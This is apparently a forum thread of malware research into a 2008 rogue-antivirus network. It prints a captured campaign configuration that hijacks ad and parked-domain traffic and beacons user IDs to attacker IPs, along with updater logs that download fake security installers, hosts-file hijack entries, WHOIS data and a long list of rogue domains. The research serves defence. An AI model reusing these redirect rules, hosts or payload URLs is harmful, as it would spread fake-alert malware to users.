- <![CDATA[ GET /?t={HEADER(Host)}&aid={AID}&uid={UID}&guid={GUID} HTTP/1.1
  ]]>
  </newvalue>
  </action>
- <action type="AddRequestHeader">
- <newvalue>
- <![CDATA[ Host: 83.149.105.113:80
  ]]>
  </newvalue>
  </action>
  </actions>
- <rules>
- <rule type="UrlKeywords">
- <![CDATA[ ^(http://)?(www(\.))?[a-zA-Z0-9,\-,\,]*\.[a-zA-Z0-9,\-,\,]*/$
  ]]>
  </rule>
- <rule type="ServerCheck">
- <![CDATA[ http://83.149.105.113:80/?t={HEADER(Host)}&aid={AID}&uid={UID}&guid={GUID}
  ]]>
  </rule>
  </rules>
- <options Level="outbound" MatchInterval="604800" MatchCount="10000">
  <Recovery MatchInterval="128498101938125000" MatchCount="9999" />
  </options>
  </CAMPAIGN>
- <CAMPAIGN name="lsd-90" id="1224101">
- <actions>
- <action type="Request">
- <newvalue>
- <![CDATA[ GET /pagead/show_ads.js?aid={AID}&uid={UID}&guid={GUID} HTTP/1.1
  ]]>
  </newvalue>
  </action>
- <action type="AddRequestHeader">
- <newvalue>
- <![CDATA[ Host: 91.184.6.104
  ]]>
  </newvalue>
  </action>
  </actions>
- <rules>
- <rule type="RequestHeader">
- <![CDATA[ Host: pagead2\.googlesyndication\.com
  ]]>
  </rule>
  </rules>
- <options Level="any" MatchCount="100000">
  <Recovery MatchCount="99982" />
  </options>
  </CAMPAIGN>
- <CAMPAIGN name="redir" id="1224301">
- <actions>
- <action type="Status">
- <newvalue>
- <![CDATA[ HTTP/1.0 302 Moved Temporarily
  ]]>
  </newvalue>
  </action>
- <action type="AddResponseHeader">
- <newvalue>
- <![CDATA[ Location:  http://ahahoo.com/ph/?u={HEADER(Location)}&a={AID}&uid={UID}&guid={GUID}
  ]]>
  </newvalue>
  </action>
- <action type="ReplaceCode">
- <sourcevalue>
- <![CDATA[ <.*>
  ]]>
  </sourcevalue>
  </action>
  </actions>
- <rules>
- <rule type="ResponseHeader">
- <![CDATA[ Location: (http://)?(www\.)?sedoparking\.com/.*
  ]]>
  </rule>
- <rule type="ResponseHeader">
- <![CDATA[ Location: (http://)?(www\.)?meanwhile\.com/.*
  ]]>
  </rule>
- <rule type="ResponseHeader">
- <![CDATA[ Location: (http://)?(www\.)?park\.parkingpanel\.com/.*
  ]]>
  </rule>
- <rule type="ResponseHeader">
- <![CDATA[ Location: (http://)?(www\.)?domainhop\.com/.*
  ]]>
  </rule>
- <rule type="ResponseHeader">
- <![CDATA[ Location: (http://)?(www\.)?mustangranch\.com/.*
  ]]>
  </rule>
- <rule type="ResponseHeader">
- <![CDATA[ Location: (http://)?(www\.)?ndparking\.com/.*
  ]]>
  </rule>
- <rule type="ResponseHeader">
- <![CDATA[ Location: (http://)?(www\.)?searchportal\.information\.com/.*
  ]]>
  </rule>
- <rule type="RequestHeader">
- <![CDATA[ GET / HTTP/
  ]]>
  </rule>
  </rules>
- <options Level="any" MatchCount="100000">
  <Recovery MatchCount="100000" />
  </options>
  </CAMPAIGN>
- <CAMPAIGN name="lsd-84" id="20071226">
- <actions>
- <action type="Status">
- <newvalue>
- <![CDATA[ HTTP/1.0 200 Ok
  ]]>
  </newvalue>
  </action>
- <action type="ReplaceCode">
- <sourcevalue>
- <![CDATA[ <.*>
  ]]>
  </sourcevalue>
- <newvalue>
- <![CDATA[
<html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <title>{HEADER(Host)}</title>
    </head>
    <frameset>
    <frame src="http://luckyadsols.com/?rotationid=start404&gai=4043&gli={URL}&gff=4042&uid={UID}&guid={GUID}&aid={AID}">
    </frameset>
    </html>
  ]]>
  </newvalue>
  </action>
- <action type="AddResponseHeader">
- <newvalue>
- <![CDATA[ Connection: close
  ]]>
  </newvalue>
  </action>
  </actions>
- <rules>
- <rule type="UrlKeywords">
- <![CDATA[ .
  ]]>
  </rule>
- <rule type="ResponseHeader">
- <![CDATA[ HTTP.*?404 Not Found
  ]]>
  </rule>
  </rules>
- <options Level="any" MatchCount="1000">
  <Recovery MatchCount="953" />
  </options>
  </CAMPAIGN>
  </CAMPAIGNLIST>
- <COOKIES>
  <COOKIE>ip=xxxxxxxxxxxxxxxxxxxx#</COOKIE>
  <COOKIE>country=RlI#</COOKIE>
  <COOKIE>network=eHg#</COOKIE>
  </COOKIES>
  </ROOT>

<h4>
The facts
</h4>
83.149.105.113

IP has no domain, but is Leaseweb. 0 Google results.
QUOTE
inetnum: 83.149.105.0 - 83.149.105.255
netname: LEASEWEB

______________________________

ahahoo.com

ICANN Registrar: RED REGISTER, INC.
Created: 2007-06-02
Expires: 2008-06-02
IP Address: 83.149.105.87
IP Location - Noord-holland - Amsterdam - Leaseweb
83.149.105.0-83.149.105.255 LEASEWEB LeaseWeb P.O. Box 93054 1090BB AMSTERDAM Netherlands

ns1.utarkasisek.net 65.243.103.51 NS
65.243.100.0-65.243.103.255 Secure Hosting Ltd. UU-65-243-100-D4 (NET-65-243-100-0-2)

hostnames sharing ip with a-records.
  • pyramidreaestate.com
  • smetsys.net
  • travelvelacity.com
domains sharing nameservers.
  • 4ocrealestate.com
  • baintravel.com
  • mp3vitan.com
  • mp3wna.net
  • pyramidreaestate.com
  • travelvelacity.com
  • utarkasisek.net
  • xsearchz.com
______________________________

91.184.6.104

IP Location: Netherlands Hostnet Bv Network
IP Address: 91.184.6.104
inetnum: 91.184.0.0 - 91.184.7.255
netname: HOSTNET-NL
descr: Hostnet BV Network
country: NL

A google search reveals some interesting stuff ... mainly hijackthis logs but they are always interesting to analyse. Below are the links and a couple of chosen parts.

1. http://www.infos-du-net.com/forum/277594-1...-antivirus-help

QUOTE
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com

O4 - HKLM\..\Run: [Salestart(1)] "C:\Program Files\Fichiers communs\PasenDommagement\mc.exe" dm=hxxp://pasendommagement.com ad=hxxp://pasendommagement.com sd=hxxp://paylogs.pasendommagement.com
O4 - HKLM\..\Run: [Salestart(2)] "C:\Program Files\Fichiers communs\MonContenuassistant\mc.exe" dm=hxxp://moncontenuassistant.com ad=hxxp://moncontenuassistant.com sd=hxxp://paylogs.moncontenuassistant.com
Note: pasendommagement.com and moncontenuassistant.com are some of the websites where french people are redirected by the malicious swf files.
______________________________

2. http://www.commentcamarche.net/forum/affic...-installe-bis#0

QUOTE
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com

O4 - HKLM\..\Run: [Salestart] "C:\Program Files\Fichiers communs\WinAntiVirus Pro 2007\mav_startupmon.exe"
O4 - HKCU\..\Run: [uwa7pcw] "C:\Program Files\Fichiers communs\WinAntiVirus Pro 2007\uwa7pcw.exe" -c

F:\c\Program Files\ErrorSafeScannerInstall_fr.exe -> Not-A-Virus.Downloader.Win32.WinFixer.d : Ignoré.
F:\temp\WinAntiVirusPro2007FreeInstall_fr.exe -> Not-A-Virus.Downloader.Win32.WinFixer.o : Ignoré.
F:\temp\SystemDoctor2006FreeInstall_fr.exe -> Not-A-Virus.Downloader.Win32.WinFixer.q : Ignoré.
______________________________

3. http://forums.techguy.org/malware-removal-...help-badly.html

QUOTE
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
______________________________

4. security.ascc.sinica.edu.tw link.

Another interesting document is a Symantec writeup on Trojan.Qhosts.F
QUOTE
When the Trojan is executed it modifies the following file:
%System%\drivers\etc\hosts

It replaces the contents of the above file with the following string:
91.184.6.104 pagead2.googlesyndication.com

The change in the hosts file causes requests for advertisements from Google to be redirected to a malicious Web site. Advertisements returned by the redirected site may contain fake advertisements or malicious content.
That seems to cover CAMPAIGN name="lsd-90" id="1224101" apparently in which we see Host: 91.184.6.104 - Host: pagead2\.googlesyndication\.com and GET /pagead/show_ads.js?aid={AID}&uid={UID}&guid={GUID} HTTP/1.1

An intresting point to remember is that at least 3 persons actually did click OK when they got redirected by the SWF files.
[Why 3 ... I see only 2 in the links you mentioned ...]
Oh, that's easy to explain, Malekal_morte's victim accepted the install of VirusEffaceur.

QUOTE
C:\Program Files
02/12/2007 13:07 <REP> VirusEffaceur
C:\Program Files\fichiers communs
12/03/2008 22:04 <REP> VirusEffaceur

c:\Documents and Settings\Famille\Application Data\install_fr[1].exe
<h4>
Thoughts about all this ...
</h4>
Is this a coincidence, a new method of updating or installing the rogue applications? Right now I don’t know. I have a couple of them running and I surely saw some interesting things but more on that later on. In meanwhile I hope you did enjoy the reading.
Kimberly
Unfortunately I didn't get any xml files but each application is different from what I saw. Could have been a different style of advert that trigged the download of those xml files too. Seeing the domains, the same bastards are involved anyways. If I find more information about those files, I'll keep you all updated here.

As said earlier, I installed one of them and ended up with several. They pretend to update their definitions but offer a new advertisement for another rogue. But first of all a bit more about Advanced Cleaner, the first in a row I got.

It has a module called abhelp.exe which connects very often to internet. It does post data back in binary form to 65.243.103.85
IPB Image
I have no idea about the content send out but I wonder if it isn't logging information. It does create several registry entries like this:
QUOTE
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\abhlp.exe
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\ccApp.exe
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\ccLgView.exe
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\Explorer.EXE
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\gfl.exe
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\IEXPLORE.EXE
Since my VM started to crawl, I wanted to reboot and saw this message about WinVNC not responding ... Needless to say that I didn't liked this at all.
IPB Image
65.243.103.85

IP Location: Bahamas Nassau Maxil Communications Ltd
IP Address: 65.243.103.85
65.243.100.0-65.243.103.255 Secure Hosting Ltd. UU-65-243-100-D4 (NET-65-243-100-0-2)
220 sh20.securehost.com ESMTP Fri, 22 Feb 2008 10:29:59 -0500 ns2.alternativerealitydomain.com A

domains using this as nameserver
alternativerealitydomain.com - 65.243.103.84
______________________________

As said, they pretend to download new definitions. They also keep a log of it. The SCNS window refers to the message box you see when you are redirected by the SWF files. The download is directly started also. Below are a couple of snipits from the different logs. A popup window doesn't occur each time they access internet. It depends on the reply of the server. Do not follow the links !

CODE
Sat Mar 15 19:05:11 2008    *******     Updater engine started     *******
Sat Mar 15 19:05:11 2008      
Sat Mar 15 19:05:11 2008    Command line is:
Sat Mar 15 19:05:11 2008    update @acu.dat -productversion=@appv.dat -appid=UADC
Sat Mar 15 19:05:11 2008    Engine thread was started.
Sat Mar 15 19:05:11 2008    Processing variables file: acu.dat
Sat Mar 15 19:05:11 2008    Warning: unable to read from registry: #Software\AdvancedCleaner Free\CustomerEmail
Sat Mar 15 19:05:11 2008    Warning: unable to read from registry: #Software\oid
Sat Mar 15 19:05:11 2008    Warning: unable to read from registry: #Software\AdvancedCleaner Free\suspicious
Sat Mar 15 19:05:11 2008    Sending request:  http://trial.advancedcleaner.com/?proto=3&rc=UADCFR-0001-8882-7773&v=1.0.52.2&abbr=UADCFR&platform=nt&os_version=5.1.2600.2.0&ac=8587ba19-add1-476e-8a60-a8bd7ffa737e&appid=UADC
&em=&pcid=1830516028
Sat Mar 15 19:05:17 2008    Engine is exiting with return code of 24.
Sat Mar 15 19:05:17 2008    SCNS window is about to show, URL:
Sat Mar 15 19:05:17 2008    http://errclean.com/.scns/?p=10&aid=scnsuadc&lid=ges0001_10&msgid=503&acid=&
Sat Mar 15 19:10:11 2008    Downloading from SCNS started "http://bsa.safetydownload.com/sysdepannage.com/SysDepannage/setup_fr.exe" -> "C:\DOCUME~1\KLY\LOCALS~1\Temp\setup_fr.exe"
Sat Mar 15 19:10:25 2008    Downloading from SCNS returned: 1
Sat Mar 15 19:10:25 2008    SCNS window is closed.
Sat Mar 15 19:10:25 2008    *******     Updater engine finished     *******

CODE
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    *******     Updater engine started     *******
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}      
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Command line is:
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    update @updater.dat -ProductVersion=@pv.dat -Server=@up.dat
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Engine thread was started.
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Processing variables file: updater.dat
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Warning: unable to read from registry: #Software\sysdepannage\CustomerEmail
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Warning: unable to read from registry: #Software\oid
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Warning: unable to read from registry: #Software\sysdepannage\suspicious
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Sending request:  http://uptrial.sysdepannage.com/?proto=3&rc=UGESV-0001-7772-8883&v=1.4.9.0&abbr=UGESV&platform=nt&os_version=5.1.2600.2.0&ac=EC9F078C-7BA9-4BF6-9959-37EA60C11568&em=&pcid=1830516028&sai=scnsuadc_mrt_0_fr_fr&sli=ges0001v_10&saf=&cnt=fr&lng=&tid=0001&nud=0
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Engine is exiting with return code of 24.
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    *******     Updater engine finished     *******
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}        
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    SCNS window is about to show, URL:
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    http://b2adz.com/?aid=ippugesv&msgid=661&acid=&show=0
Sat Mar 15 19:49:39 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    SCNS window is closed.

CODE
Sat Mar 15 20:19:11 2008    *******     Updater engine started     *******
Sat Mar 15 20:19:11 2008      
Sat Mar 15 20:19:11 2008    Command line is:
Sat Mar 15 20:19:11 2008    "C:\Program Files\MenaceControle\Up\gup.exe" update  -ProductVersion="@C:\Program Files\MenaceControle\Dat\pv.dat" -Appearance=Normal -AppID=UGA6PV -IntegratedMode=1 -TaskID=0 -TaskID=0
Sat Mar 15 20:19:11 2008    Engine thread was started.
Sat Mar 15 20:19:12 2008    Processing variables file: C:\Program Files\MenaceControle\Up\updater.dat
Sat Mar 15 20:19:12 2008    Sending request:  http://gratuit.restauration.menacecontrole.com/?proto=3&rc=UGA6PV-0001-8882-7773&v=2.2.362.4&abbr=UGA6PV&platform=nt&os_version=5.1.2600.2.0&ac=AE31D73B-2A52-4A4C-85FC-3C88A71F5DC6&appid=UGA6PV&em=&pcid=1830516028
Sat Mar 15 20:19:51 2008    Engine is exiting with return code of 24.
Sat Mar 15 20:19:51 2008    SCNS window is about to show, URL:
Sat Mar 15 20:19:51 2008    http://b2adz.com/?aid=ippuga6pv&msgid=639&acid=&
Sat Mar 15 20:20:22 2008    Downloading from SCNS started "http://bsa.safetydownload.com/chasseurdeserreures.com/ChasseurDesErreures/setup_fr.exe" -> "C:\DOCUME~1\KLY\LOCALS~1\Temp\setup_fr.exe"
Sat Mar 15 20:20:36 2008    Downloading from SCNS returned: 1
Sat Mar 15 20:20:36 2008    SCNS window is closed.
Sat Mar 15 20:20:37 2008    *******     Updater engine finished     *******
Sat Mar 15 20:09:14 2008        
Sat Mar 15 20:30:37 2008    *******     Updater engine started     *******
Sat Mar 15 20:30:37 2008    Command line is:
Sat Mar 15 20:30:37 2008    "C:\Program Files\MenaceControle\Up\gup.exe" update @ASupdater.dat -ProductVersion="@C:\Program Files\MenaceControle\Engines\AWBase\vbpv.dat" -Appearance=Normal -AppID=UGA6PV -IntegratedMode=1 -TaskID=0
Sat Mar 15 20:30:37 2008    Engine thread was started.
Sat Mar 15 20:30:38 2008    Processing variables file: C:\Program Files\MenaceControle\Up\updater.dat
Sat Mar 15 20:30:39 2008    Processing variables file: C:\Program Files\MenaceControle\Up\ASupdater.dat
Sat Mar 15 20:30:39 2008    Warning: couldn't read OID from #HKLM\SOFTWARE\MenaceControle\OID
Sat Mar 15 20:30:39 2008    Warning: couldn't read Suspicious from #HKLM\SOFTWARE\MenaceControle\Suspicious
Sat Mar 15 20:30:39 2008    Warning: couldn't read CustomerEmail from #HKLM\Software\MenaceControle\CustomerEmail
Sat Mar 15 20:30:39 2008    Sending request:  http://gratuit.restauration.menacecontrole.com/?proto=3&rc=WAS-0001-0002-0003&v=99.3.3.185&abbr=WAS&platform=nt&os_version=5.1.2600.2.0&ac=AE31D73B-2A52-4A4C-85FC-3C88A71F5DC6&appid=UGA6PV&em=&pcid=1830516028
Sat Mar 15 20:31:03 2008    Engine is exiting with return code of 24.
Sat Mar 15 20:31:03 2008    *******     Updater engine finished     *******
Sat Mar 15 20:31:03 2008        
Sat Mar 15 20:43:54 2008    *******     Updater engine started     *******
Sat Mar 15 20:43:54 2008      
Sat Mar 15 20:43:54 2008    Command line is:
Sat Mar 15 20:43:54 2008    "C:\Program Files\MenaceControle\Up\gup.exe" update  -ProductVersion="@C:\Program Files\MenaceControle\Dat\pv.dat" -Appearance=Normal -AppID=UGA6PV -IntegratedMode=1 -TaskID=0 -TaskID=0
Sat Mar 15 20:43:54 2008    Engine thread was started.
Sat Mar 15 20:43:55 2008    Processing variables file: C:\Program Files\MenaceControle\Up\updater.dat
Sat Mar 15 20:43:55 2008    Sending request:  http://gratuit.restauration.menacecontrole.com/?proto=3&rc=UGA6PV-0001-8882-7773&v=2.2.362.4&abbr=UGA6PV&platform=nt&os_version=5.1.2600.2.0&ac=AE31D73B-2A52-4A4C-85FC-3C88A71F5DC6&appid=UGA6PV&em=&pcid=1830516028
Sat Mar 15 20:44:02 2008    Engine is exiting with return code of 24.
Sat Mar 15 20:44:02 2008    SCNS window is about to show, URL:
Sat Mar 15 20:44:02 2008    http://b2adz.com/?aid=ippuga6pv&msgid=639&acid=&
Sat Mar 15 20:45:14 2008    Downloading from SCNS started "http://bsa.safetydownload.com/utilisateursur.com/UtilisateurSur/setup_fr.exe" -> "C:\DOCUME~1\KLY\LOCALS~1\Temp\setup_fr.exe"
Sat Mar 15 20:45:21 2008    Downloading from SCNS returned: 1
Sat Mar 15 20:45:21 2008    SCNS window is closed.
Sat Mar 15 20:45:22 2008    *******     Updater engine finished     *******

Illustrated that gives ....
  • Update module is launched.

    IPB Image
  • Internet access is requested.
  • Application server is contacted. If a "message" is available, the website mentioned next to Text is contacted.

    IPB Image

    IPB Image
  • User is redirected to "the fake alert site".

    IPB Image
  • Fake alert is displayed and the setupfile is downloaded.

    IPB Image
Another rogue application, Virus Effaceur, has a strange behavior too, it keeps pinging several sites as seen in the log below.

CODE
Fri Mar 14 18:29:40 2008    Diagnostic report begin.
Fri Mar 14 18:29:41 2008    Resolving hostname yahoo.com: 207.68.172.246
Fri Mar 14 18:29:41 2008    Resolving hostname msn.com: 207.68.172.246
Fri Mar 14 18:29:41 2008    Pinging 216.109.112.135: response code 0 from 216.109.112.135 after 200 milliseconds.
Fri Mar 14 18:29:41 2008    Pinging 216.109.112.135: response code 0 from 216.109.112.135 after 201 milliseconds.
Fri Mar 14 18:29:41 2008    Pinging 216.109.112.135: response code 0 from 216.109.112.135 after 180 milliseconds.
Fri Mar 14 18:29:41 2008    Pinging 216.109.112.135: response code 0 from 216.109.112.135 after 220 milliseconds.
Fri Mar 14 18:29:44 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:44 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:47 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:47 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:50 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:50 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:53 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:53 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:56 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:59 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:59 2008    End diagnostic report

Maybe I wasn't lucky enough to get the xml files but at least I got a few new IP's. I will post them later on.
Kimberly
<h4>
Errclean.com - 67.55.81.200
</h4>
Server Type: nginx/0.5.32
IP Location - New York - Jericho - Webair Internet Development Inc
Registrant:
Errclean Inc
1425 Marine Drive, 205
Montreal, V7T 1B9
BM

Domain name: ERRCLEAN.COM

Administrative Contact:
Pollack, Sam voidupdates.com(at)googlemail.com
1425 Marine Drive, 205
Montreal, V7T 1B9
BM
2951001
Technical Contact:
Pollack, Sam voidupdates.com(at)googlemail.com
1425 Marine Drive, 205
Montreal, V7T 1B9
BM
2951001

Registrar of Record: TUCOWS, INC.
Record last updated on 18-Feb-2008.
Record expires on 14-Jun-2009.
Record created on 14-Jun-2006.

Registrar Domain Name Help Center:
http://domainhelp.tucows.com

Domain servers in listed order:
NS4.ERRCLEAN.COM 77.73.98.4
NS1.ERRCLEAN.COM 208.79.82.50
NS2.ERRCLEAN.COM 208.79.82.66
NS3.ERRCLEAN.COM 77.73.98.2

Websites.
  1. Accelerateurmaligne.com
  2. Aceleradorlisto.com
  3. Addioerrori.com
  4. Adioserrores.com
  5. Adremversneller.com
  6. Alltiettantivirus.com
  7. Anchisupaisutsu.com
  8. Anchiwamu2008.com
  9. Anonymwinpc.com
  10. Antiespiadorado.com
  11. Antiespionspack.com
  12. Antigusanos2008.com
  13. Antimalwareshield.com
  14. Antispionage.com
  15. Antispionagepro.com
  16. Antispypremium.com
  17. Antispywarecontrol.com
  18. Antispywarecontrole.com
  19. Antispywarecontrollo.com
  20. Antispywarekontrolle.com
  21. Antispywareseigyo.com
  22. Antispywaresuite.com
  23. Antiver2008.com
  24. Antivirusaskeladd.com
  25. Antivirusgenial.com
  26. Antivirusgereedschap.com
  27. Antivirusordi.com
  28. Antiviruspcpakke.com
  29. Antiviruspcsuite.com
  30. Antiviruspertutti.com
  31. Antivirusscherm.com
  32. Antivirussolusjon.com
  33. Antiworm2008.com
  34. Antiwurm2008.com
  35. Aucunsvirus.com
  36. Avsystemcare.com
  37. Avsystemshield.com
  38. Bedreigingsmonitoor.com
  39. Bedsteantivirus.com
  40. Bereiniger.com
  41. Beschermingstool.com
  42. Besutohogo.com
  43. Bogyotsuru.com
  44. Bortmedvirus.com
  45. Bugdokter.com
  46. Bugsdestroyer.com
  47. Cleverspeeder.com
  48. Conducteurprive.com
  49. Controlantiespia.com
  50. Controlloreprivacy.com
  51. Debellaworm2008.com
  52. Defectshuri.com
  53. Defensaantimalware.com
  54. Diannaoqingjieji.com
  55. Discerrorfree.com
  56. Discosemerros.com
  57. Discosenzaerrori.com
  58. Discosinerrores.com
  59. Diskfejlfri.com
  60. Diskrensare.com
  61. Disqudurprotection.com
  62. Doctordiska.com
  63. Doctorwinalhasoob.com
  64. Dokterfix.com
  65. Doraibuhogo.com
  66. Drivedefender.com
  67. Driveproteccion.com
  68. Easysprinter.com
  69. Echterschutz.com
  70. Effaceurvirus.com
  71. Einaprivadesapc.com
  72. Elevarendimiento.com
  73. Enkelsprinter.com
  74. Errclean.com
  75. Erro-out.com
  76. Errorfri.com
  77. Errorout.com
  78. Errorskydd.com
  79. Errorsoshi.com
  80. Fehlerbeseitiger.com
  81. Fejlrenser.com
  82. Festplattenreiniger.com
  83. Fiksfeil.com
  84. Filtrodetrojan.com
  85. Filtrotroiani.com
  86. Fixmenaces.com
  87. Fullsystemprotection.com
  88. Goldenantispy.com
  89. Gorudenanchisupai.com
  90. Handigebeheerder.com
  91. Harddiskvakt.com
  92. Harddrevvagt.com
  93. Hataduzelticisi.com
  94. Herramientadereparacion.com
  95. Hukommelsesbeskytter.com
  96. Hulpprogramma.com
  97. Kansennashi.com
  98. Kantansprinter.com
  99. Keinegefahr.com
  100. Keinespuren.com
  101. Keinestoerungen.com
  102. Klogspeeder.com
  103. Klugerspeeder.com
  104. Konsekieraser.com
  105. Kontentsueraser.com
  106. Kvikkpc.com
  107. Kyoishusei.com
  108. Kyouikyuuen.com
  109. Leichtersprinter.com
  110. Lettsprinter.com
  111. Liberapc.com
  112. Libresystem.com
  113. Lifelongpc.com
  114. Maskinpcpro.com
  115. Maximumantivirus.com
  116. Megaviruskit.com
  117. Megliopc.com
  118. Meinbesterschutz.com
  119. Melhorpc.com
  120. Memoiredefenseur.com
  121. Menacerescue.com
  122. Menacesecure.com
  123. Mendingtool.com
  124. Miavcompleto.com
  125. Mijnantivirus.com
  126. Minnesverktyg.com
  127. Mistikotitatuipologisti.com
  128. Moncontenuassistant.com
  129. Mounathifalwindos.com
  130. Msahihalakhtaa.com
  131. Munazifalhasob.com
  132. Nadadevirus.com
  133. Nemsprinter.com
  134. Nettordinateur.com
  135. Nettoyagevirus.com
  136. Nientevirus.com
  137. Nochanceforvirus.com
  138. Nocompromaat.com
  139. Noespias.com
  140. Norwayvirus.com
  141. Nowayvirus.com
  142. Nulinfektioner.com
  143. Oczyszczaczkomputerza.com
  144. Onlinepcguard.com
  145. Orantiespion.com
  146. Ottimizzaveloce.com
  147. Pasokoneiju.com
  148. Pc-prot.com
  149. Pcbeskyttelse.com
  150. Pcforbedring.com
  151. Pclyftare.com
  152. Pcohneviren.com
  153. Pcoppdrettere.com
  154. Pcopschoner.com
  155. Pcopschoningsstel.com
  156. Pcprivacytool.com
  157. Pcraiser.com
  158. Pcrengoringsmaskine.com
  159. Pcreveil.com
  160. Pcsamensteller.com
  161. Pcscattista.com
  162. Pcschirmer.com
  163. Pcsegura.com
  164. Pcsikker.com
  165. Pcsikkerhed.com
  166. Pcsod.com
  167. Pcsuanbukkon.com
  168. Pcverdediger.com
  169. Pcvirusless.com
  170. Pembersihkomputer.com
  171. Performancekoujou.com
  172. Plattefehlerfrei.com
  173. Pp-total.com
  174. Privacidadconductor.com
  175. Privacidadeprotegida.com
  176. Privacidadplus.com
  177. Privacyconductor.com
  178. Privatsicherer.com
  179. Proteccionconfiable.com
  180. Protectingtool.com
  181. Protectioncomplete.com
  182. Protejaseudrive.com
  183. Protejasudrive.com
  184. Protezionesoft.com
  185. Puliscitutto.com
  186. Pulitasystem.com
  187. Puliturasystem.com
  188. Puraibashimaneja.com
  189. Regbotemedel.com
  190. Regrensere.com
  191. Rejishufuku.com
  192. Rendator.com
  193. Rensningverktyg.com
  194. Reparameacas.com
  195. Reparamenazas.com
  196. Reparetudo.com
  197. Rescatedeamenazas.com
  198. Riscattodaminacce.com
  199. Sanitardiska.com
  200. Scattofacile.com
  201. Schijfhersteller.com
  202. Schutztool.com
  203. Semerros.com
  204. Senzaerrori.com
  205. Shufukutsuru.com
  206. Sicheressystem.com
  207. Sikkerpcvaerktoj.com
  208. Sininfecciones.com
  209. Sistemaimune.com
  210. Skyddsverktyg.com
  211. Sletingenvirus.com
  212. Smartkasoku.com
  213. Smartokare.com
  214. Solutionreg.com
  215. Sprinterfacile.com
  216. Sprinterpc.com
  217. Stoltbeskyttelse.com
  218. Suiteantispyware.com
  219. Supashuri.com
  220. Suspenzorpc.com
  221. Sysdepannage.com
  222. Syskontroller.com
  223. Syslibero.com
  224. Systemesansvirus.com
  225. Systemfreigabe.com
  226. Systemordnare.com
  227. Systemreiniging.com
  228. Tabortvirus.com
  229. Temizsurucu.com
  230. Toroianfiruta.com
  231. Trojanerfilter.com
  232. Trojansfilter.com
  233. Trojansfiltre.com
  234. Trojanskiller.com
  235. Tryggdator.com
  236. Turvapc.com
  237. Utiledeprotection.com
  238. Vacinatotal.com
  239. Varrevirus.com
  240. Vaskredskap.com
  241. Velocidadsimple.com
  242. Vigilamenazas.com
  243. Virenfrierpc.com
  244. Virenloescher.com
  245. Virenstopper.com
  246. Virtual-leatherman.com
  247. Virtualpcguard.com
  248. Virusdeteccion.com
  249. Virusdifesa.com
  250. Viruseffaceur.com
  251. Virusfjernere.com
  252. Virusforsvar.com
  253. Virusfrittsystem.com
  254. Virusgarde.com
  255. Virusschlacht.com
  256. Virusstopper.net
  257. Virusudryddet.com
  258. Virusuwadame.com
  259. Virusvakt.com
  260. Virusvanguard.com
  261. Wegvonviren.com
  262. Winadsiz.com
  263. Winanonyme.com
  264. Winanonymitet.com
  265. Winanonymous.com
  266. Winanzen.com
  267. Winbescherming.com
  268. Windefensa.com
  269. Windifesavirale.com
  270. Winhogo.com
  271. Winkujoenjin.com
  272. Winpcalmeglio.com
  273. Winpcdocteur.com
  274. Winpcdoctor.com
  275. Winpcdoktor.com
  276. Winpckontroll.com
  277. Winpcrensare.com
  278. Winpcrensere.com
  279. Winriservatezza.com
  280. Winsecureav.com
  281. Winsecurite.com
  282. Winsikkerantivirus.com
  283. Winsikretav.com
  284. Winspycontrol.com
  285. Winsurffilter.com
  286. Wintemizleyicisi.com
